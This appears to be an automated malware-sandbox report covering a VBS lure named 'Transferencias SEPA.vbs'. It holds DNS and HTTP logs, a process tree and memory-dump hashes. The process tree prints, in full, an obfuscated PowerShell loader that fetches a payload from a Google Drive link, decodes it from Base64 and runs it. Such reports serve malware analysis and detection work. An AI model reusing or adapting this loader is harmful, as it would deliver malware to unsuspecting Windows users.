Apr 18, 2024 11:07:04.496249914 CEST | 1.1.1.1 | 192.168.2.11 | 0x738e | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.50.38 | A (IP address) | IN (0x0001) | false
Apr 18, 2024 11:07:04.496249914 CEST | 1.1.1.1 | 192.168.2.11 | 0x738e | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.51.24 | A (IP address) | IN (0x0001) | false
Apr 18, 2024 11:07:04.496249914 CEST | 1.1.1.1 | 192.168.2.11 | 0x738e | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.55.36 | A (IP address) | IN (0x0001) | false
Apr 18, 2024 11:07:04.496249914 CEST | 1.1.1.1 | 192.168.2.11 | 0x738e | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.50.39 | A (IP address) | IN (0x0001) | false
Apr 18, 2024 11:07:08.463291883 CEST | 1.1.1.1 | 192.168.2.11 | 0x54a8 | No error (0) | drive.google.com | | 173.194.219.101 | A (IP address) | IN (0x0001) | false
Apr 18, 2024 11:07:08.463291883 CEST | 1.1.1.1 | 192.168.2.11 | 0x54a8 | No error (0) | drive.google.com | | 173.194.219.113 | A (IP address) | IN (0x0001) | false
Apr 18, 2024 11:07:08.463291883 CEST | 1.1.1.1 | 192.168.2.11 | 0x54a8 | No error (0) | drive.google.com | | 173.194.219.139 | A (IP address) | IN (0x0001) | false
Apr 18, 2024 11:07:08.463291883 CEST | 1.1.1.1 | 192.168.2.11 | 0x54a8 | No error (0) | drive.google.com | | 173.194.219.102 | A (IP address) | IN (0x0001) | false
Apr 18, 2024 11:07:08.463291883 CEST | 1.1.1.1 | 192.168.2.11 | 0x54a8 | No error (0) | drive.google.com | | 173.194.219.100 | A (IP address) | IN (0x0001) | false
Apr 18, 2024 11:07:08.463291883 CEST | 1.1.1.1 | 192.168.2.11 | 0x54a8 | No error (0) | drive.google.com | | 173.194.219.138 | A (IP address) | IN (0x0001) | false
Apr 18, 2024 11:07:09.036909103 CEST | 1.1.1.1 | 192.168.2.11 | 0x81aa | No error (0) | drive.usercontent.google.com | | 173.194.219.132 | A (IP address) | IN (0x0001) | false
Apr 18, 2024 11:07:36.005597115 CEST | 1.1.1.1 | 192.168.2.11 | 0xfadd | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Apr 18, 2024 11:07:36.005597115 CEST | 1.1.1.1 | 192.168.2.11 | 0xfadd | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Apr 18, 2024 11:08:23.406512976 CEST | 1.1.1.1 | 192.168.2.11 | 0xaf33 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Apr 18, 2024 11:08:23.406512976 CEST | 1.1.1.1 | 192.168.2.11 | 0xaf33 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                                  • drive.google.com
                                  • drive.usercontent.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.11 | 49707 | 173.194.219.101 | 443 | 6536 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-18 09:07:08 UTC | 215 | OUT | GET /uc?export=download&id=1qLlr6CiWFPDuLfJcuCpG8-GkYKixhbza HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                  Host: drive.google.com
                                  Connection: Keep-Alive
2024-04-18 09:07:08 UTC | 1582 | IN | HTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Thu, 18 Apr 2024 09:07:08 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1qLlr6CiWFPDuLfJcuCpG8-GkYKixhbza&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Content-Security-Policy: script-src 'nonce-RaBasBAB1ERwj8h7eZxU5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Cross-Origin-Opener-Policy: same-origin
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.11 | 49708 | 173.194.219.132 | 443 | 6536 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-18 09:07:09 UTC | 233 | OUT | GET /download?id=1qLlr6CiWFPDuLfJcuCpG8-GkYKixhbza&export=download HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                  Host: drive.usercontent.google.com
                                  Connection: Keep-Alive
2024-04-18 09:07:09 UTC | 2120 | IN | HTTP/1.1 200 OK
                                  X-GUploader-UploadID: ABPtcPqGrhCss4brSa7lea_e8uEKYMH6l_1EvZiep0ELHVKJxplBb0HDxyZHfJynSeGCUtF4vA
                                  Content-Type: text/html; charset=utf-8
                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Thu, 18 Apr 2024 09:07:09 GMT
                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Content-Security-Policy: script-src 'nonce-JQ0T_puuGKTirJFt-9B0hw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Cross-Origin-Resource-Policy: same-site
                                  Cross-Origin-Opener-Policy: same-origin
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  reporting-endpoints: default="/_/DriveUntrustedContentHttp/web-reports?context=eJzj0tDikmJw15BisN47ndUeiJ3SZ7CGAPHqn-dY1wPx4rDzrCuAWIiHY-_R5o1sAg_unVnMDAAJlRWH"
                                  Content-Length: 1692
                                  Server: UploadServer
                                  Set-Cookie: NID=513=Ls_LvMv3P2xdRuUbrBJi_84pet3K35bGcMZfJ9SA6JkB_kSrx63gXUUTjVMUIH1fc1Gxj47buSCvGb9QQz9IH0-6RjKVRVfxcbynMNFyUbx2WbSN8hC5x35LVCtQiHrY3mdmu2RPokZrc84__v3a9csN_K_FCQmHbgPf48IH394; expires=Fri, 18-Oct-2024 09:07:09 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Content-Security-Policy: sandbox allow-scripts
                                  Connection: close
                                  2024-04-18 09:07:09 UTC | 1692 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 47 6f 6f 67 6c 65 20 44 72 69 76 65 20 2d 20 49 6e 66 65 63 74 65 64 20 66 69 6c 65 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 42 53 32 32 37 41 54 6c 32 39 67 6e 4e 4e 70 55 44 55 70 53 77 22 3e 2e 67 6f 6f 67 2d 6c 69 6e 6b 2d 62 75 74 74 6f 6e 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6f 6c 6f 72 3a 23 31 35 63 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 75 72 73 6f 72
                                  Data Ascii: <!DOCTYPE html><html><head><title>Google Drive - Infected file</title><meta http-equiv="content-type" content="text/html; charset=utf-8"/><style nonce="aBS227ATl29gnNNpUDUpSw">.goog-link-button{position:relative;color:#15c;text-decoration:underline;cursor

                                  Target ID:0
                                  Start time:11:07:03
                                  Start date:18/04/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Transferencias SEPA.vbs"
                                  Imagebase:0x7ff77a2a0000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:2
                                  Start time:11:07:05
                                  Start date:18/04/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Undervisningsdisketterne = 1;$Strafferammen='Substrin';$Strafferammen+='g';Function Toxophilism87($Sanerendes){$Uneath=$Sanerendes.Length-$Undervisningsdisketterne;For($Vacciners=5; $Vacciners -lt $Uneath; $Vacciners+=(6)){$Ceylonite+=$Sanerendes.$Strafferammen.Invoke($Vacciners, $Undervisningsdisketterne);}$Ceylonite;}function anthropometry($Registrating){& ($Bothroi) ($Registrating);}$Gimmerlams=Toxophilism87 'Ke neMNovelo TarszEbonii NonslMadrelOm kiaFiske/Luffi5,isun. algn0Fagbl Micon( Re lWvejovi.ecannFilmadDockioStudewGhi esOgre. .rocaNReal TUncon S,kke1 pars0Gsteh.Ublod0,risv; ata M,croW SmndiCatapnBefly6Ext.a4Expos;Lande LaissxKolon6Habit4Tandb;Suppe BrndrGloriv Sel,: Buke1Latin2S,eat1Baand. col,0Overm)Cloch vavtoGFodboeRichec.ellmkwhango,leuk/fo,ok2Nim u0Fests1.eesf0Thema0Skrum1Marin0Ilyas1Attr, GodfFPassainon rrMode.eBromdfAandeoMopedxRe ri/haand1Pht.i2Extem1T,lsp.Broug0Kaske ';$Nyttendes=Toxophilism87 ' SpapUDampis.orpueBrugerLabio-PhymaAKllingwergieKarklnHexadtIr,ny ';$Fraraadede=Toxophilism87 'Tentah FientharestTrstepFa,cisLenna: Guns/fabri/Underd UnderUrediiMilitvT,ereeAssyr.Herm gHu oeoOx dioFlelsgHornylRow,ieStere.Realkc Grefo Tallmunend/statsuBa.saccolle? 
T.ndePejlix KiefpDovneoOutmarNuchatU,ndf=QuantdJiliaoInterwTalernBjlenl Midto Tilpa DiskdTakof& Overislen,dElevr=Unpro1 reabqhovedL BevilDis.erBrand6EkspaCCho.diUdv,kWHexadFPiperPB,kseDSpermuGymnoLFu.iofHalvfJZucc,cA keruUn,huC Assap or aG lami8Photo-TiemaGStemmkoutglYTrbesK FyrsiTappexUfor hoverbbBarflztaktlaInddk ';$Pjankede=Toxophilism87 'Grune>Trste ';$Bothroi=Toxophilism87 'unobeiCereve AlarxBrock ';$Perfektibilitet = Toxophilism87 'CentueFla.kcAssonhSceneoDil t Di.ul%.ianoaSubmupMarkopErhvedNonira,ndettShutoa acch%R,mod\Pr teFC,ntrlQu nod.eaveeAlderkG lgeaTulreg IslneB fanrForur.SamfuCTaxikopreponVarme P.dal& andm&Coc f MikreTapnecP,eudhSporioDezin Frike$ ncon ';anthropometry (Toxophilism87 'Poka,$AarstgTillglg,bisoBrevsbStrigaSynsol Pal :SannalKulhyi FrigqStaalu E,evoUniv rJuv.ni Vands KjerhSkrmt= Fors( AblacAbr,kmNonredSuper Sipun/ SvincSanct Jaque$,iltrP AkemeFustirNarkofBludge VarmkMiljbtFolleiModstbSwerviYe.selFab,liLderrtPropie Beket,oist)Anemo ');anthropometry (Toxophilism87 'Cst.d$Ens,agPhenolSensuoSyddab b fia,ocialFnull: PranUDebitnNarcodF ldmeonsetrShaftv UkorgSpitftUntoliM rragSangshTolv,e Tyr,dAtomusC,lic1arbej3Fo ge4Eneba=Brunk$StokeFNeds,rClewkaBacksrUi,enaMaxima RecidS,oene Klipd PolyeUnsad. Ber s PinepRe.atl .akoiHs patUn.es( Send$ semiP NedsjSlagvanonsan SteekUndune,ochudAbse ePr.li)Amfit ');$Fraraadede=$Undervgtigheds134[0];anthropometry (Toxophilism87 'Sji p$ Pe igN.endlUbe,roTilkbb Beaca,rownlStddm:IntraGWeanleMatc,n AmtmaMaidinEncydvGnosteInthrnL.ncedUndfleResmelLy,fosSoniaeVikinsDelmol Pr,lo SeedvMotoreSgekrn Teame.ddans Renv=PiptoNStnkpeOverfwAfvis-OverdO Da.hbfyrrejStorieHeintcMultitEnriq TropSChec,y OrdesEkstetNa abeDrnudmLappa.Brug.NTallee KafftFersk.teddyW B,chestosnbAffreCtredalknastiDemoke To enCompetBrode ');anthropometry (Toxophilism87 'Be.ol$umaadGGge.de Uar,nTymbaaTha.ln EvejvDelpreCyllonSensodAss seLovbelSidetsNynaze Eksesy,unglSmackoSt.fsvA,tiaeRetian Per.e.inocs Vult. 
svinH,undfeMele.atelemd StraeInterrDissis Bo.e[Diona$Sek.nNGrnsey,eflet PredtFortyeBde insignadBiplae ManasAppro]An iu= .uic$Lexi.GAlfadi Equim.bjecmGeldeeSkr.erR.stalNoaa.aHi,simSpaltsStorh ');$Ampereomraadet=Toxophilism87 'balloGBut oeSideon kibsaMo.ybnresi,vIn faeBrakinKl.kedT ukhe Elevl H,ngsring e m shs Acrolsu,faoBank vSquase BhutnSaniceOk ids Fler.TilgaDSo.anoPaterw taktnebulll solsoB.rina verhd,efleF.ortliOrdgylDiploeAuto (Wo,se$PaataF ris,r PaleaL gderRegasaUnpepaRokk,d o,deeLodssdAsbe.e Po,b,Vi.il$ Hje ERhabdx Gynetserote OverrMeninnSkrubastryklOmlahiNicotsOvervt V ne)freml ';$Ampereomraadet=$liquorish[1]+$Ampereomraadet;$Externalist=$liquorish[0];anthropometry (Toxophilism87 'c.alo$Evelig.croalSwon.oSh,nkbGrensaptakilAccel:ScurfF De ulTop,gySkivgtRentet Udste ,ilid Afv eDmret5B,dtv3Semem=touch(Hyd tTJerseeRetousCarkit,eled- nconPProfoa DiartPreaphIndiv Hane,$ .ydaES.rifxTitretPree,eMagrerFlbedn ManiaEntonl S,ori Bin,sLugsatIs.la)Svirv ');while (!$Flyttede53) {anthropometry (Toxophilism87 'Exter$A.etagUnwillF.skeoRutscbAn.ihaAthyml Aale:StackU ReconValmuiVarmeoeffecnDidnhe ArberSpi tnSireneN,isk=Snarl$G atbtGenlorafgifuUru,ueTalsm ') ;anthropometry $Ampereomraadet;anthropometry (Toxophilism87 'UnconSIsospt.bsciaBank rDemartPara -TowelSAdvoklPaavie VapoeInd,fp Bran agna.4H rbi ');anthropometry (Toxophilism87 'Respo$PseudgO.ervl Jul.oRad.lbHypoma B bulSy.te: FaglFGagerlThen,yBaggrtSailptBun,ee Fro.dTrefae Uful5 jene3 st i=Over,(Un.alTAllegeC,kels Hi rtFagud-Lew,sPFlaucaPseudtAcrobh Drak Chim$Het rE Sti,xSndr tChondeComper AftenHmorra AlerlOpspoiWissfsHorolt O cu)Arbej ') ;anthropometry (Toxophilism87 'Laven$Udskng ,ecolS.bpeo.nforbAf,ada Ba elKvart: KorsROssmie sdumsTer,iiFjerngBort,nPlatte PolarTor,l7preda7Seeds=Speci$Neostg VeralcigaroEpimybOptllaTvrfalHasta: mblaKin.ttFigurl Per a SkrmsKnudde .umbnCerem+,ryll+Nonju%Verni$PlastU indwnAkkomd rgeeUnciar Au,ovma.thgFurunt.egroiCarpog Folkh UnuteH.emod Be,isStilm1Bille3afval4 Ambu.BoudocAgg eo Slufu,rndvn 
CeretUnsal ') ;$Fraraadede=$Undervgtigheds134[$Resigner77];}anthropometry (Toxophilism87 ' Snoo$ Ce.egBannelAffalo,aldybRo.leaN.ngrlKortl:H.nstNQuizeoP.lshnStyr,cTabitoOverpn Su asBecrat.oyalrO,dknuInhalcRoupetPectiiAromeoTofron Yuca Chak=Gen e MonogGTranse bio,tConge-PommeCHjer okashunUncoftSvve,eunangnAu,omtTmrer .kraa$ProsoE PlebxVedhntdanefe.langrGamogn .fbraHid rlRes.piClouesMu.ift Form ');anthropometry (Toxophilism87 'Anlg $unencgommatlSalg oSteelbUnbecaMe,allHelle:AllurDHumpbaskovanServenEthicePlenulDiurnsNotioe Myeln,ekst Pig t=Straf Det.[HuskeS TaagyAr,its rtshtAberre BoffmMedli.GengaCNedsloKomtenKatapvOv.rseSy,osrlli,gtUnmat]Expro:,argi: topmFSagkyrDevouoI.conm NarrB TegnaPy.mysSorroeGaste6Tyl.s4BabyeS Middtko.parFilitiStrimn.ispugHande(Affec$Rep.gNVir.loVet.rnKontocHypheoGribenSpisesG inst N.dkrLirkeu YankcHundetGeosiiForuno Da tnDagsk)L raw ');anthropometry (Toxophilism87 'Vejar$Holocg MicelSma hoHelhebs,miaa,ahool Or.i:Umbe,SMetolaGrubenFejl.sUdspaeValorlHaabeiP,atygAtom hT emoeu,ilad Koks Plagi=Gkke, anma,[ SamfST.uchyTvangsSkar,tGigasePredim.tten.NagysTf.ongeVristxNull.t omot. PengEForsonFixatcErklroLseladFuturiSamlenhypo,g Broc]Mel n: Rhin:Hij cA KiosS Mar C Kva,IHypopIFlids.O rafG Ink.eL.bstt UnroShype.tUdeblrS edpiBortgn Of.egCent (K uli$TaageD JongaFirepn C rinDefiaeTidsbl Igans,dspaeVapsenMedic)Varie ');anthropometry (Toxophilism87 ' sp.g$Goni.g HaralArkimoOverrbBiotoaRoyallOrdre: V tiFMed,cyPausenHyttebC oreo.herme Kis.r Encan IdreeFldeb=patri$Bere,SFoulma sktnKatols Op.ae DemolSo,iviGrnseg .ilphAcroseFrlaadEfter. Un,asGirokuhotmebTeknosKassetPyrenr Ep sist renOsteogParis(Syste3 Bor,0Spati4Thwar9O,ner8 Lang2Doler,pil t2 E.in9 adi3Koinc4 ,nde8Klu.e) Kult ');anthropometry $Fynboerne;"
                                  Imagebase:0x7ff6eb350000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:3
                                  Start time:11:07:05
                                  Start date:18/04/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff68cce0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:10
                                  Start time:11:07:07
                                  Start date:18/04/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fldekager.Con && echo $"
                                  Imagebase:0x7ff659830000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1437399587.00007FFE7E980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E980000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffe7e980000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2a72538a8c20ce0528c26c34a417946f06e7b5efd92a98b79d3311f299a35618
                                    • Instruction ID: b5d51450920c3a3ab9aa07985f836a863b8d445717c7b03a534baf9376305588
                                    • Opcode Fuzzy Hash: 2a72538a8c20ce0528c26c34a417946f06e7b5efd92a98b79d3311f299a35618
                                    • Instruction Fuzzy Hash: 63216A1559E3C1AFD35797781CB46A63FA8AF43214B0844EBE0D8CB4F7D90C191AC3A6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1437399587.00007FFE7E980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E980000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffe7e980000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 94b5a8efea5998f4e3b1f787e32a6399781a74b3b19664ca931c0e7fc4d63492
                                    • Instruction ID: 0150bb082d084130cfc55e82c88a79a5f6e9cb5d51b40aa5d3a87dec27091a44
                                    • Opcode Fuzzy Hash: 94b5a8efea5998f4e3b1f787e32a6399781a74b3b19664ca931c0e7fc4d63492
                                    • Instruction Fuzzy Hash: 0321295686F7C16FD35343781C695A67FB8AE03224B1C40EBD0E88A0B3E80C181AC3A3
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1436780418.00007FFE7E8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E8B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffe7e8b0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                    • Instruction ID: 06ebab12bdcb369ede310e39e3572e2b90b197151d5f7cd1311bc6972edf6e38
                                    • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                    • Instruction Fuzzy Hash: 5301A73111CB0C4FDB44EF0CE051AA5B3E0FB85320F10052EE58AC3661D636E881CB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1437399587.00007FFE7E980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E980000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffe7e980000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8cf37f1001ea9183cbf170e593f45ead347191a11acadaa5ce53a53d6c492d71
                                    • Instruction ID: 48c62c7b00133a9d208d47d9ade2586046c39fd21caecb89c11b2ec12775fb18
                                    • Opcode Fuzzy Hash: 8cf37f1001ea9183cbf170e593f45ead347191a11acadaa5ce53a53d6c492d71
                                    • Instruction Fuzzy Hash: 81016232A2C9494FEB88DB1C9454AB973E3FF88315B5801B5E05DC36B6CE39EC408780
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1437399587.00007FFE7E980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7E980000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffe7e980000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 97d9bb80a13f3a8fbde7b38aefece5955150d47f5bdbd22cc2d3eeee02580206
                                    • Instruction ID: c59a9e785dbb8d61271e3f91eb669973c0696271258a9ec2f71bbf97b8848a20
                                    • Opcode Fuzzy Hash: 97d9bb80a13f3a8fbde7b38aefece5955150d47f5bdbd22cc2d3eeee02580206
                                    • Instruction Fuzzy Hash: CCF01C32A289198FEB94EB5CD4459E8B3F2FF48315B5801B6E01DC7671DA39EC41C780
                                    Uniqueness

                                    Uniqueness Score: -1.00%